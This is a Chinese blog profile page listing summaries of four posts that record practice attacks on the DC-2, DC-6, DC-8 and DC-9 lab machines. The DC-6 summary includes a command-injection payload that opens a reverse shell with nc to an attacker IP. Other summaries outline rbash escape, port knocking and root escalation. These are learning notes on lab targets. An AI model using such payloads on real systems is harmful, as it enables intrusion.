自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 DC-6靶机渗透学习记录

7.用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.6.137 7878进行反弹shell,同时在kali中监听7878端口。6.在ID or integer的输入框中输入一个网站地址,如:baidu.com,然后点击Lookup,发现有回显。`--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。例如:nmap,WPscan,burpsuite,dirb等等。得到admin,mark,graham,sarah,jens几个用户名。

2024-07-16 17:01:58 762

原创 DC-2靶机渗透学习记录

1)根据flag3提示,我们应该进行提权,切换为jerry用户,但是shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功su jerry。1)根据flag2提示,我们要去寻找其他攻击渗透点,所以我们把目光放到靶机的第二个端口7744端口。打开了一个shell(部分功能依旧不可用),进入/home/jerry目录下查看文件flag4.txt。1)根据flag1提示,我们使用cewl工具,提取网页中关键词,生成密码字典。3)进入/root目录查看最终flag文件,完成DC-2靶机渗透。

2024-07-14 18:59:44 1088

原创 DC-9靶机渗透学习记录

我们可以通过端口探测进行开启ssh服务。通俗来说端口探测可以理解为,我按顺序敲击端口就可以将ssh服务打开,反之敲击关闭,端口顺序存放在/etc/knockd.conf文件中。发现用户名和密码,尝试在web登陆页面使用,尝试几次后并不能登录,猜测该用户名和密码并不是web登录页面的用户名和密码。kali中安装需要的工具,如:nmap,sqlmap,dirb,hydra,nc,burpsuite等等。发现新的fredf用户,登录该用户,sudo -l命令查看到以root权限运行的文件,进行查看。

2024-07-13 18:55:08 940 1

原创 DC-8靶机渗透过程学习记录

不确定必不必要但我做了(由于windows系统下编辑然后上传到linux系统执行会导致的格式错误,要加上本地编辑查看文件类型:set ff=unix,按shift+:set ff=unix,再回车保存退出,然后再去上传执行的时候才不会报错)kali中要有所需要的工具,如:nmap,sqlmap,中国蚁剑,dirb,searchsploit等等。10.使用123.sh,获得root权限,进入/root目录,打开flag.txt文件,完成本次靶机。2.打开kali,nmap查看kali的IP地址。

2024-07-12 21:40:10 455

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除